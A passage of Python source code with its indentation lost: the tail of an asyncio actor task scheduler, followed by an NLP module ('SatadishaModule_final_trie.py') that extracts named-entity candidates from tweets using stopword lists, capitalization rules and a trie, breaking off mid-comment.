return_when="FIRST_COMPLETED",
)
for t_queue in self._sorted_queues:
if t_queue.done():
return t_queue.pop()
async def _process_task(
self,
running_actor: "ActorBase",
next_task: "SchedulerTask",
fails: int,
):
if next_task is POISON_PILL:
raise ActorPoisoned("poisoned")
try:
out = await self.dist_api.get_future(running_actor, next_task)
if isinstance(out, Exception):
raise out
result = TaskResult(out, True, self._is_last(next_task))
next_task.set_future(result)
return 0
except self.dist_api.exception as e:
self._log("Remote consumption error ", e=e, te=type(e))
if self._debug:
self._logger.exception(e)
next_task.fail_count += 1
if next_task.fail_count > next_task.max_fails:
is_last = self._is_last(next_task)
result = TaskResult(self.dist_api.parse_exception(e), False, is_last)
next_task.set_future(result)
else:
await self._task_queues[next_task.requirements].put(next_task)
if fails >= ALLOWED_CONSUMER_FAILS:
raise ActorListenBreaker(f"{fails} number of fails reached")
return fails + 1
def _log(self, s, **kwargs):
if self._debug:
self._logger.info(s, **kwargs)
def _is_last(self, task: "SchedulerTask"):
return self._task_queues[task.requirements].size == 0
@property
def _wait_on_tasks(self):
return chain(
*[self._task_queues[k].tasks for k in self._task_keys],
[self.poison_queue.getting_task],
)
@property
def _sorted_queues(self):
keys = sorted(self._task_keys)
return reversed([self.poison_queue, *map(self._task_queues.get, keys)])
@property
def _task_keys(self):
return filter(self.capset.__ge__, self._task_queues.keys())
@property
def _logger(self):
return get_logger(**self._log_dic)
@property
def _log_dic(self):
return {
"actor": self.actor_cls.__name__,
"tasks": self.task_count,
"actors_running": self.running_actor_count,
}
class SchedulerTask:
def __init__(
self,
argument: Any,
requirements: List[Capability] = None,
properties: List[TaskPropertyBase] = None,
allowed_fail_count: int = 1,
):
self.argument = argument
self.requirements = CapabilitySet(requirements or [])
self.properties = properties or []
self.max_fails = allowed_fail_count
self.fail_count = 0
self.future = None
def __repr__(self) -> str:
return (
f"Task: {self.argument}, "
"Requires: {self.requirements}, "
"Future: {self.future}"
)
def init_future(self):
self.future = asyncio.Future()
def set_future(self, task_result):
self.future.set_result(task_result)
@dataclass
class TaskResult:
value: Any
is_ok: bool
is_last_in_queue: bool
|
SatadishaModule_final_trie.py
|
# coding: utf-8
# In[298]:
import sys
import re
import string
import csv
import random
import time
#import binascii
#import shlex
import numpy as np
import pandas as pd
from itertools import groupby
from operator import itemgetter
from collections import OrderedDict
from collections.abc import Iterable # direct import from collections is removed in Python 3.10+
from nltk.tokenize import sent_tokenize, word_tokenize
from nltk.corpus import stopwords
from scipy import stats
#from datasketch import MinHash, MinHashLSH
import NE_candidate_module as ne
import Mention
import threading, queue
import datetime
import copy
import trie as trie
# In[324]:
#---------------------Existing Lists--------------------
cachedStopWords = stopwords.words("english")
tempList=["i","and","or","other","another","across","were","you","then","still","is","while","till","nor","perhaps","otherwise","until","sometimes","sometime","seem","cannot","seems","because","can","like","into","able","unable","either","neither","if","we","it","else","elsewhere","how","not","what","who","when","where","where's","where’s","where'd","where’d","where'll","where’ll","who's","who’s","he's","he’s","he’d","he'd","she's","she’s","she’d","she'd","let","today","tomorrow","tonight","let's","let’s","lets","know","make","oh","via","i","yet","must","mustnt","mustn't","mustn’t","i'll","i’ll","you'll","you’ll","we'll","we’ll","done","doesnt","doesn't","doesn’t","dont","don't","don’t","did","didnt","didn't","didn’t","much","without","could","couldn't","couldn’t","would","wouldn't","wouldn’t","should","shouldn't","shouldn’t","shall","isn't","isn’t","hasn't","hasn’t","was","wasn't","wasn’t","also","let's","let’s","let","well","just","everyone","anyone","noone","none","someone","theres","there's","there’s","everybody","nobody","somebody","anything","else","elsewhere","something","nothing","everything","i'd","i’d","i’m","won't","won’t","i’ve","i've","they're","they’re","we’re","we're","we'll","we’ll","we’ve","we've","they’ve","they've","they’d","they'd","they’ll","they'll","again","you're","you’re","you've","you’ve","thats","that's",'that’s','here’s',"here's","what's","what’s","i’m","i'm","a","so","except","arn't","aren't","arent","this","when","it","it’s","it's","he's","she's","she'd","he'd","he'll","she'll","she’ll","many","can't","cant","can’t","werent","weren't","were’t","even","yes","no","these","here","there","to","maybe","<hashtag>","<hashtag>.","ever","every","never","there's","there’s","whenever","wherever","however","whatever","always"]
prep_list=["in","at","of","on","with","by","&;"] #includes common conjunction as well
article_list=["a","an","the"]
day_list=["sunday","monday","tuesday","wednesday","thursday","friday","saturday","mon","tues","wed","thurs","fri","sat","sun"]
month_list=["january","february","march","april","may","june","july","august","september","october","november","december","jan","feb","mar","apr","may","jun","jul","aug","sep","oct","nov","dec"]
for item in tempList:
if item not in cachedStopWords:
cachedStopWords.append(item)
cachedStopWords.remove("don")
#cachedStopWords.remove("may")
cachedTitles = ["mr.","mr","mrs.","mrs","miss","ms","sen.","dr","dr.","prof.","president","congressman"]
chat_word_list=["please","4get","ooh","idk","oops","yup","stfu","uhh","2b","dear","yay","btw","ahhh","b4","ugh","ty","cuz","coz","sorry","yea","asap","ur","bs","rt","lfmao","slfmao","u","r","nah","umm","ummm","thank","thanks","congrats","whoa","rofl","ha","ok","okay","hey","hi","huh","ya","yep","yeah","fyi","duh","damn","lol","omg","congratulations","fuck","wtf","wth","aka","wtaf","xoxo","rofl","imo","wow","fck","haha","hehe","hoho"]
#string.punctuation.extend('‘','’','…')
#---------------------Existing Lists--------------------
# In[300]:
class SatadishaModule():
def __init__(self):
print("hello")
#self.batch=batch
#self.batch=self.batch[:3000:]
self.counter=0
#self.extract()
def flatten(self,mylist, outlist,ignore_types=(str, bytes, int, ne.NE_candidate)):
if mylist !=[]:
for item in mylist:
#print not isinstance(item, ne.NE_candidate)
if isinstance(item, list) and not isinstance(item, ignore_types):
self.flatten(item, outlist)
else:
if isinstance(item,ne.NE_candidate):
item.phraseText=item.phraseText.strip(' \t\n\r')
item.reset_length()
else:
if type(item)!= int:
item=item.strip(' \t\n\r')
outlist.append(item)
return outlist
def normalize(self,word):
strip_op=word
strip_op=(((strip_op.lstrip(string.punctuation)).rstrip(string.punctuation)).strip()).lower()
strip_op=(strip_op.lstrip('‘’“”')).rstrip('‘’“”')
#strip_op= self.rreplace(self.rreplace(self.rreplace(strip_op,"'s","",1),"’s","",1),"‘s","",1)
if strip_op.endswith("'s"):
li = strip_op.rsplit("'s", 1)
return ''.join(li)
elif strip_op.endswith("’s"):
li = strip_op.rsplit("’s", 1)
return ''.join(li)
else:
return strip_op
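# Illustrative behaviour (hypothetical inputs):
# normalize('"Trump\'s"') -> 'trump' (punctuation stripped, possessive
# removed, lowercased); normalize('“Obama’s”') -> 'obama'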
#@profile
def extract(self,batch,batch_number):
#df = read_csv('eric_trump.csv', index_col='ID', header=0, encoding='utf-8')
print("Phase I extracting now")
time_in=time.time()
self.batch=batch
#output.csv
#df_out= DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'usertype', 'TweetSentence', 'phase1Candidates'))
self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','start_time','entry_batch','annotation'))
if(self.counter==0):
#self.df_out= pd.DataFrame(columns=('tweetID', 'sentID', 'hashtags', 'user', 'TweetSentence', 'phase1Candidates','correct_candidates_tweet'))
#dict1 = {'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}
self.CTrie=trie.Trie("ROOT")
self.ME_EXTR=Mention.Mention_Extraction()
#self.df_out= pd.DataFrame({'tweetID':0, 'sentID':0, 'hashtags':'first', 'user':'user', 'TweetSentence':'sentence', 'phase1Candidates':'phase1Out','start_time':'now','entry_batch':'batch_number'}, index=[0,])
#%%timeit -o
#module_capital_punct.main:
'''I am running this for 100 iterations for testing purposes. Of course you no longer need this for loop as you are
#running one tuple at a time'''
#if(self.counter==0):
#initializing candidateBase with a dummy node
#self.interCWSGap={}
#candidateBase={}
#NE_container=DataFrame(columns=('candidate', 'frequency', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'))
count=0
ne_count=0
userMention_count=0
#token_count=0
NE_list_phase1=[]
UserMention_list=[]
df_holder=[]
#--------------------------------------PHASE I---------------------------------------------------
for index, row in self.batch.iterrows():
now = datetime.datetime.now()
#now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
#hashtags=str(row['Discussion'])
hashtags=str(row['HashTags'])
user=str(row['User'])
#userType=str(row['User Type'])
tweetText=str(row['TweetText'])
#correct_candidates_tweet=str(row['Mentions'])
#print(str(index))
annot_raw=str(row['mentions_other'])
split_list=annot_raw.split(";")
#split_listFilter=list(filter(lambda element: element.strip()!='', split_list))
split_listFilter=list(filter(None, split_list))
#annotations in list of list structure
filtered_2_times=list(map(lambda element: list(filter(None, element.split(','))), split_list))
#capitalization module
#if all words are capitalized:
# print(index)
# print(filtered_2_times)
# if(len(filtered_2_times)==0):
# filtered_2_times=[[]]
if tweetText.isupper():
dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
df_holder.append(dict1)
elif tweetText.islower():
print("",end="")
dict1 = {'tweetID':str(index), 'sentID':str(0), 'hashtags':hashtags, 'user':user, 'TweetSentence':tweetText, 'phase1Candidates':"nan",'start_time':now,'entry_batch':batch_number,'annotation':filtered_2_times[0]}
df_holder.append(dict1)
else:
ne_List_final=[]
userMention_List_final=[]
#pre-modification: returns word list split at whitespaces; retains punctuation
tweetSentences=list(filter (lambda sentence: len(sentence)>1, tweetText.split('\n')))
tweetSentenceList_inter=self.flatten(list(map(lambda sentText: sent_tokenize(sentText.lstrip().rstrip()),tweetSentences)),[])
tweetSentenceList=list(filter (lambda sentence: len(sentence)>1, tweetSentenceList_inter))
for sen_index in range(len(tweetSentenceList)):
sentence=tweetSentenceList[sen_index]
modified_annotations=[self.normalize(candidate) for candidate in filtered_2_times[sen_index]]
annotation=[]
for candidate in modified_annotations:
if(candidate=="nan"):
pass
else:
annotation.append(candidate)
# for i in filtered_2_times[sen_index]:
# if(i=="nan"):
#print(sentence)
#print(sen_index)
#tweetWordList= list(filter(lambda word:(word.strip(string.punctuation))!="",sentence.split()))
tempList=[]
tempWordList=sentence.split()
#print(tempWordList)
for word in tempWordList:
temp=[]
if "..." in word:
#print("here")
temp=list(filter(lambda elem: elem!='',word.split("...")))
# if(temp1):
# temp=list(map(lambda elem: elem+'...', temp1[:-1]))
# temp.append(temp1[-1])
elif ".." in word:
temp=list(filter(lambda elem: elem!='',word.split("..")))
# if(temp1):
# temp=list(map(lambda elem: elem+'..', temp1[:-1]))
# temp.append(temp1[-1])
elif (("?" in word)&(not word.endswith("?"))):
temp1=list(filter(lambda elem: elem!='',word.split("?")))
if(temp1):
temp=list(map(lambda elem: elem+'?', temp1[:-1]))
temp.append(temp1[-1])
elif ((":" in word)&(not word.endswith(":"))):
temp1=list(filter(lambda elem: elem!='',word.split(":")))
if(temp1):
temp=list(map(lambda elem: elem+':', temp1[:-1]))
temp.append(temp1[-1])
elif (("," in word)&(not word.endswith(","))):
#temp=list(filter(lambda elem: elem!='',word.split(",")))
temp1=list(filter(lambda elem: elem!='',word.split(",")))
if(temp1):
temp=list(map(lambda elem: elem+',', temp1[:-1]))
temp.append(temp1[-1])
elif (("/" in word)&(not word.endswith("/"))):
temp1=list(filter(lambda elem: elem!='',word.split("/")))
if(temp1):
temp=list(map(lambda elem: elem+'/', temp1[:-1]))
temp.append(temp1[-1])
#print(index, temp)
else:
#if word not in string.punctuation:
temp=[word]
if(temp):
tempList.append(temp)
tweetWordList=self.flatten(tempList,[])
#print(tweetWordList)
#token_count+=len(tweetWordList)
#returns position of words that are capitalized
#print(tweetWordList)
tweetWordList_cappos = list(map(lambda element : element[0], filter(lambda element : self.capCheck(element[1]), enumerate(tweetWordList))))
#print(tweetWordList_cappos)
#returns list of stopwords in tweet sentence
combined_list_here=([]+cachedStopWords+article_list+prep_list+chat_word_list)
#combined_list_here.remove("the")
tweetWordList_stopWords=list(filter(lambda word: ((word[0].islower()) & (((word.strip()).strip(string.punctuation)).lower() in combined_list_here))|(word.strip() in string.punctuation)|(word.startswith('@')), tweetWordList))
#returns list of @userMentions
userMentionswPunct=list(filter(lambda phrase: phrase.startswith('@'), tweetWordList))
userMentions=list(map(lambda mention: mention.rstrip(string.punctuation), userMentionswPunct))
userMention_count+=len(userMentions)
userMention_List_final+=userMentions
'''#function to process and store @ user mentions---- thread 1
#print(userMention_List_final)
threading.Thread(target=self.ME_EXTR.ComputeAll, args=(userMention_List_final,)).start()'''
#non @usermentions are processed in this function to find non @, non hashtag Entities---- thread 2
ne_List_allCheck=[]
#if(len(tweetWordList)>len(tweetWordList_cappos)):
#print(len(tweetWordList),str(len(tweetWordList_cappos)),str(len(tweetWordList_stopWords)))
if((len(tweetWordList))>(len(tweetWordList_cappos))):
#q = queue.Queue()
#threading.Thread(target=self.trueEntity_process, args=(tweetWordList_cappos,tweetWordList,q)).start()
ne_List_allCheck= self.trueEntity_process(tweetWordList_cappos,tweetWordList)
#ne_List_allCheck= q.get()
ne_count+=len(ne_List_allCheck)
ne_List_final+=ne_List_allCheck
#write row to output dataframe
phase1Out=""
if(len(tweetWordList)==len(tweetWordList_cappos)):
phase1Out="nan"
if(len(ne_List_allCheck)>0):
for candidate in ne_List_allCheck:
position = '*'+'*'.join(str(v) for v in candidate.position)
position=position+'*'
candidate.set_sen_index(sen_index)
phase1Out+=(((candidate.phraseText).lstrip(string.punctuation)).strip())+ '::'+str(position)+"||"
#print(self.df_out.columns)
dict1 = {'tweetID':str(index), 'sentID':str(sen_index), 'hashtags':hashtags, 'user':user, 'TweetSentence':sentence, 'phase1Candidates':phase1Out,'start_time':now,'entry_batch':batch_number,'annotation':annotation}
df_holder.append(dict1)
#self.df_out.append(outrow)
#self.df_out=self.df_out.append(outrow,ignore_index=True)
for candidate in ne_List_final:
#self.insert_dict (candidate,self.NE_container,candidateBase,index,candidate.sen_index,batch_number)
candidateText=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
candidateText=(candidateText.lstrip('‘’“”')).rstrip('‘’“”')
candidateText= self.rreplace(self.rreplace(self.rreplace(candidateText,"'s","",1),"’s","",1),"‘s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
if not ((candidateText in combined)|(candidateText.isdigit())|(self.is_float(candidateText))):
self.CTrie.__setitem__(candidateText.split(),len(candidateText.split()),candidate.features,batch_number)
#self.printList(ne_List_final)
#if(userMention_List_final):
# print(userMention_List_final)
NE_list_phase1+=ne_List_final
UserMention_list+=userMention_List_final
#print ("\n")
#fieldnames=['candidate','freq','length','cap','start_of_sen','abbrv','all_cap','is_csl','title','has_no','date','is_apostrp','has_inter_punct','ends_verb','ends_adverb','change_in_cap','topic_ind','entry_time','entry_batch','@mention']
#updated_NE_container=[]
'''#Updating trie with @mention info
self.CTrie.updateTrie("",self.ME_EXTR)'''
time_out=time.time()
#for display purposes Iterating through the trie
'''candidateBase= self.CTrie.__iter__()
for node in candidateBase:
print(node)'''
'''for key in self.NE_container.keys():
val=self.NE_container[key]+[str(ME_EXTR.checkInDictionary(key))]
#index+=1
#updated_NE_container[key]=val
dict1 = {'candidate':key, 'freq':val[0],'length':val[1],'cap':val[2],'start_of_sen':val[3],'abbrv':val[4],'all_cap':val[5],'is_csl':val[6],'title':val[7],'has_no':val[8],'date':val[9],'is_apostrp':val[10],'has_inter_punct':val[11],'ends_verb':val[12],'ends_adverb':val[13],'change_in_cap':val[14],'topic_ind':val[15],'entry_time':val[16],'entry_batch':val[17],'@mention':val[18]}
updated_NE_container.append(dict1)'''
'''with open('candidate_base.csv', 'w') as output_candidate:
#with open('candidates.csv', 'w') as output_candidate:
writer = csv.writer(output_candidate)
writer.writerow(fieldnames)
for k, v in updated_NE_container.items():
writer.writerow([k] + v)'''
#print("Total number of tokens processed: "+str(token_count))
#print ("Total number of candidate NEs extracted: "+str(len(candidateBase)))
#print(self.NE_container.items())
#freqs=pd.read_csv('candidate_base.csv', encoding = 'utf-8',delimiter=',')
#freqs = pd.DataFrame(updated_NE_container, columns=fieldnames)
#freqs = pd.DataFrame()
#freqs=pd.DataFrame(list(self.NE_container.items()), orient='index')#columns=fieldnames)
self.append_rows(df_holder)
self.counter=self.counter+1
#return (copy.deepcopy(self.df_out),copy.deepcopy(freqs),time_in,time_out)
return (self.df_out,self.CTrie,time_in,time_out)
#return sorted_candidateBase
#@profile
def append_rows(self,df_holder):
df = pd.DataFrame(df_holder)
self.df_out=self.df_out.append(df)
self.df_out.to_csv('tweet_base.csv' ,sep=',', encoding='utf-8')
def rreplace(self,s, old, new, occurrence):
if s.endswith(old):
li = s.rsplit(old, occurrence)
return new.join(li)
else:
return s
def stopwordReplace(self, candidate):
if(candidate.features[ne.is_quoted]):
return candidate
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
wordlist=list(filter(lambda word: word!='', candidate.phraseText.split()))
pos=candidate.position
#print(candidate.phraseText,wordlist,pos)
start=0
flag=False
while(start!=len(pos)):
if(wordlist[start].lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined):
#flag=True
break
start+=1
end=len(pos)-1
while(end>=0):
#print(wordlist[end])
if(wordlist[end].lstrip(string.punctuation).rstrip(string.punctuation).strip() not in combined):
#flag=True
break
end-=1
#print(start,end)
updated_pos=pos[start:(end+1)]
updated_phrase=' '.join(wordlist[start:(end+1)])
#print(updated_pos,updated_phrase)
candidate.phraseText=updated_phrase
candidate.position=updated_pos
return candidate
# In[301]:
#candidate: 'frequency','length', 'capitalized', 'start_of_sentence', 'abbreviation', 'all_capitalized','is_csl','title','has_number','date_indicator','is_apostrophed','has_intermediate_punctuation','ends_like_verb','ends_like_adverb','change_in_capitalization','has_topic_indicator'
def is_float(self,text): # renamed arg: avoid shadowing the `string` module
try:
f=float(text)
if(f==0.0):
return True
else:
return ((f) and (text.count(".")==1))
#return True# True if string is a number with a dot
except ValueError: # if string is not a number
return False
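# Illustrative behaviour (hypothetical inputs): is_float("3.14") -> True,
# is_float("0.0") -> True, is_float("314") -> False (no decimal point),
# is_float("abc") -> False.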
def insert_dict(self,candidate,NE_container,candidateBase,tweetID,sentenceID,batch):
key=(((candidate.phraseText.lstrip(string.punctuation)).rstrip(string.punctuation)).strip(' \t\n\r')).lower()
key=(key.lstrip('‘’“”')).rstrip('‘’“”')
key= self.rreplace(self.rreplace(self.rreplace(key,"'s","",1),"’s","",1),"‘s","",1)
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
try:
if ((key in combined)|(key.isdigit())|(self.is_float(key))):
return
except TypeError:
print(key)
tweetID=str(tweetID)
sentenceID=str(sentenceID)
if key in self.NE_container:
feature_list=self.NE_container[key]
feature_list[0]+=1
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
else:
now = datetime.datetime.now()
now=str(now.hour)+":"+str(now.minute)+":"+str(now.second)
feature_list=[0]*17
feature_list[0]+=1
feature_list[1]=candidate.length
#call background process to check for non capitalized occurences
for index in [0,1,2,3,4,5,6,7,9,10,11,13,14]:
if (candidate.features[index]==True):
feature_list[index+2]+=1
for index in [8,12]:
if (candidate.features[index]!=-1):
feature_list[index+2]+=1
feature_list.append(now)
feature_list.append(batch)
self.NE_container[key] = feature_list
#insert in candidateBase
'''if key in candidateBase.keys():
#candidateBase[key]=candidateBase[key]+[str(tweetID)+":"+str(sentenceID)]
if(tweetID in candidateBase[key]):
if(sentenceID in candidateBase[key][tweetID] ):
candidateBase[key][tweetID][sentenceID]=candidateBase[key][tweetID][sentenceID]+1
else:
candidateBase[key][tweetID][sentenceID]=1
else:
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1
#c=[(y,str(idx)) for idx,y in enumerate( a) if y not in b]
#candidateBase[key]
else:
#candidateBase[key]=[str(tweetID)+":"+str(sentenceID)]
candidateBase[key]={}
candidateBase[key][tweetID]={}
candidateBase[key][tweetID][sentenceID]=1'''
return
# In[302]:
def printList(self,mylist):
print("["),
#print "[",
for item in mylist:
if item != None:
if isinstance(item,ne.NE_candidate):
item.print_obj()
#print (item.phraseText)
else:
print (item+",", end="")
#print item+",",
#print "]"
print("]")
return
# In[303]:
# In[304]:
def consecutive_cap(self,tweetWordList_cappos,tweetWordList):
output=[]
#identifies consecutive numbers in the sequence
#print(tweetWordList_cappos)
for k, g in groupby(enumerate(tweetWordList_cappos), lambda element: element[0]-element[1]):
output.append(list(map(itemgetter(1), g)))
count=0
if output:
final_output=[output[0]]
for first, second in (zip(output,output[1:])):
#print(first,second)
#print(tweetWordList[first[-1]])
if ((not (tweetWordList[first[-1]]).endswith('"'))&((second[0]-first[-1])==2) & (tweetWordList[first[-1]+1].lower() in prep_list)):
(final_output[-1]).extend([first[-1]+1]+second)
elif((not (tweetWordList[first[-1]].endswith('"')))&((second[0]-first[-1])==3) & (tweetWordList[first[-1]+1].lower() in prep_list)& (tweetWordList[first[-1]+2].lower() in article_list)):
(final_output[-1]).extend([first[-1]+1]+[first[-1]+2]+second)
else:
final_output.append(second)
#merge_positions.append(False)
else:
final_output=[]
return final_output
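# Worked example (illustrative): for
# tweetWordList = ["The", "Bank", "of", "America", "said"] and
# tweetWordList_cappos = [0, 1, 3], groupby yields the runs [0, 1] and [3];
# position 2 holds "of" (a preposition), so the runs are merged and the
# result is [[0, 1, 2, 3]].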
# In[305]:
#basically splitting the original NE_candidate text and building individual object from each text snippet
def build_custom_NE(self,phrase,pos,prototype,feature_index,feature_value):
#print("Enters")
position=pos
custom_NE= ne.NE_candidate(phrase,position)
for i in range(15):
custom_NE.set_feature(i,prototype.features[i])
custom_NE.set_feature(feature_index,feature_value)
if (feature_index== ne.is_csl) & (feature_value== True):
custom_NE.set_feature(ne.start_of_sentence, False)
custom_NE=self.entity_info_check(custom_NE)
return custom_NE
# In[306]:
def abbrv_algo(self,ne_element):
'''abbreviation algorithm
trailing apostrophe:
|period:
| multiple letter-period sequence:
| all caps
| non period:
| ?/! else drop apostrophe
else:
unchanged
'''
phrase= ne_element.phraseText
#print("=>"+phrase)
#since no further split occurs we can set remaining features now
ne_element.set_feature(ne.capitalized, True)
if ne_element.phraseText.isupper():
ne_element.set_feature(ne.all_capitalized, True)
else:
ne_element.set_feature(ne.all_capitalized, False)
abbreviation_flag=False
p=re.compile(r'[^a-zA-Z\d\s]$')
match_list = p.findall(phrase)
if len(match_list)>0:
#print("Here")
if phrase.endswith('.'):
#print("Here")
p1= re.compile(r'([a-zA-Z][\.]\s*)')
match_list = p1.findall(phrase)
if ((len(match_list)>1) & (len(phrase)<6)):
#print ("1. Found abbreviation: "+phrase)
abbreviation_flag= True
else:
if (phrase[-2]!=' '):
phrase= phrase[:-1]
else:
#if phrase.endswith(string.punctuation):
if (phrase[-2]!=' '):
phrase= phrase[:-1]
#if not (phrase.endswith('?')|phrase.endswith('!')|phrase.endswith(')')|phrase.endswith('>')):
#phrase= phrase[:-1]
else:
p2=re.compile(r'([^a-zA-Z0-9_\s])')
match_list = p2.findall(phrase)
if ((len(match_list)==0) & (phrase.isupper()) & (len(phrase)<7)& (len(phrase)>1)):
#print ("2. Found abbreviation!!: "+phrase)
abbreviation_flag= True
else:
#print("Here-> "+phrase)
p3= re.compile(r'([A-Z][.][A-Z])')
p4= re.compile(r'\s')
match_list = p3.findall(phrase)
match_list1 = p4.findall(phrase)
if ((len(match_list)>0) & (len(match_list1)==0)):
abbreviation_flag= True
#print ("3. Found abbreviation!!: "+phrase)
#element= ne.NE_candidate(phrase.strip())
ne_element.phraseText=phrase
ne_element.reset_length()
ne_element.set_feature(ne.abbreviation, abbreviation_flag)
return ne_element
# In[307]:
def punct_clause(self,NE_phrase_in):
NE_phrases=self.entity_info_check(NE_phrase_in)
cap_phrases=NE_phrases.phraseText.strip()
final_lst=[]
#print (cap_phrases,NE_phrases.features[ne.date_indicator])
if (re.compile(r'[^a-zA-Z0-9_\s]')).findall(cap_phrases):
#case of intermediate punctuations: handles abbreviations
p1= re.compile(r'(?:[a-zA-Z0-9][^a-zA-Z0-9_\s]\s*)')
match_lst = p1.findall(cap_phrases)
#print(match_lst)
if match_lst:
index= (list( p1.finditer(cap_phrases) )[-1]).span()[1]
p= re.compile(r'[^a-zA-Z\d\s]')
match_list = p.findall(cap_phrases)
p2=re.compile(r'[^a-zA-Z\d\s]$') #ends with punctuation
if ((len(match_list)>0)&(len(match_lst)>0)&((len(match_list)-len(match_lst))>0)):
if (p2.findall(cap_phrases)):
#only strips trailing punctuations, not intermediate ones following letters
cap_phrases = cap_phrases[0:index]+re.sub(p, '', cap_phrases[index:])
NE_phrases.phraseText= cap_phrases
#comma separated NEs
#lst=filter(lambda(word): word!="", re.split('[,]', cap_phrases))
#print ("=>"+ cap_phrases)
start_of_sentence_fix=NE_phrases.features[ne.start_of_sentence]
#temp=re.split("\...", cap_phrases)
#inter=self.flatten(list(map(lambda elem: re.split('[,:!โฆ]',elem),temp)),[])
#print("'''",inter)
combined=cachedStopWords+prep_list+article_list+day_list+chat_word_list
splitList=re.split('["‘’“”()/,;:!?…]',cap_phrases)
splitList=list(filter(lambda word: ((word!="")&(word.lstrip(string.punctuation).rstrip(string.punctuation).strip().lower() not in combined)), splitList))
#print("==",splitList)
wordlstU=list(map(lambda word: word.strip().strip(string.punctuation), splitList))
wordlstU=list(filter(lambda word: word!="", wordlstU))
wordlst=list(filter(lambda word: ((word.strip().strip(string.punctuation))[0].isupper()|(word.strip().strip(string.punctuation))[0].isdigit()), wordlstU))
#print(":::",wordlst)
if ((NE_phrases.features[ne.date_indicator]==False)):
#print("hehe")
if(len(splitList)>1):
if(len(wordlst)>0):
#print("here::")
pos=NE_phrases.position
combined_positions=[] # renamed: the old name shadowed the stopword list used below
prev=0
for i in range(len(wordlst)):
word=wordlst[i]
word_len=len(list(filter(lambda individual_word: individual_word!="", re.split('[ ]', word))))
word_pos=pos[(prev):(prev+word_len)]
prev=prev+word_len
combined_positions+=[[word]+word_pos]
lst_nsw=list(filter(lambda element: (((str(element[0])).strip(string.punctuation).lower() not in combined)& (not (str(element[0])).strip(string.punctuation).isdigit()) & (len(str(element[0]))>1)) ,combined_positions))
#print ("++",lst_nsw)
if(lst_nsw):
final_lst= list(map(lambda element:self.build_custom_NE(str(element[0]),element[1:],NE_phrases,ne.is_csl,True), lst_nsw))
final_lst[0].set_feature(ne.start_of_sentence, NE_phrases.features[ne.start_of_sentence])
else:
final_lst=[]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
else:
NE_phrases.set_feature(ne.is_csl,False)
final_lst=[NE_phrases]
#check abbreviation
#print("++",final_lst)
if(final_lst):
final_lst= list(map(lambda phrase: self.abbrv_algo(phrase), final_lst))
#print(lst)
return final_lst
# In[308]:
#%%timeit -o
def f(self,y,sflag,quoteFlag,tweetWordList):
combined=[]+cachedStopWords+cachedTitles+prep_list+chat_word_list+article_list+day_list
#print(sflag)
if sflag:
left=""
right=""
lp=(-1)
rp=(-1)
i=0
j=len(y)-1
flag1=False
flag2=False
x=[]
while (((flag1==False)|(flag2==False))&((j-i)>0)):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('‘’"“”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('‘’"“”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(flag1,flag2)
#if((flag1==False)|(flag2==False)):
# while (((j-i)!=0)|((flag1==False)|(flag2==False))):
if(flag1==False):
left=(((tweetWordList[y[i]].strip('‘’"“”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
#print(left)
if(left not in combined):
flag1=True
lp=i
else:
i+=1
if(flag2==False):
right=(((tweetWordList[y[j]].strip('‘’"“”')).strip("'").lstrip(string.punctuation)).rstrip(string.punctuation)).lower()
if(right not in combined):
flag2=True
rp=j
else:
j-=1
#print(lp,rp)
if(lp==rp):
if(lp!=-1):
x=[y[lp]]
else:
x=y[lp:(rp+1)]
else:
x=y
#print(x)
if(x):
list1=list(map(lambda word: tweetWordList[word], x))
phrase=" ".join(e for e in list1)
#print(phrase)
phrase1="".join(list1)
#if not ((phrase[0].isdigit()) & (len(x)==1)):
if not (phrase1.strip().isdigit()):
NE_phrase= ne.NE_candidate(phrase.strip(),x)
if 0 in x:
NE_phrase.set_feature(ne.start_of_sentence,True)
else:
NE_phrase.set_feature(ne.start_of_sentence,False)
NE_phrase.set_feature(ne.is_quoted,quoteFlag)
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
else:
NE_phrase= ne.NE_candidate("JUST_DIGIT_ERROR",[])
#print("====>>",NE_phrase.phraseText)
return NE_phrase
# In[309]:
def capCheck(self,word):
combined_list=[]+cachedStopWords+prep_list+chat_word_list+article_list
if word.startswith('@'):
return False
elif "<Hashtag" in word:
return False
#elif (((word.strip('‘’“”')).lstrip(string.punctuation)).rstrip(string.punctuation)).lower() in combined_list:
elif (((word.strip('‘’“”')).lstrip(string.punctuation)).rstrip(string.punctuation)) in combined_list:
# if((word=="The")|(word=="THE")):
# return True
# else:
return True
elif word[0].isdigit():
return True
else:
p=re.compile(r'^[\W]*[A-Z]')
l= p.match(word)
if l:
return True
else:
return False
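# Illustrative behaviour (hypothetical inputs):
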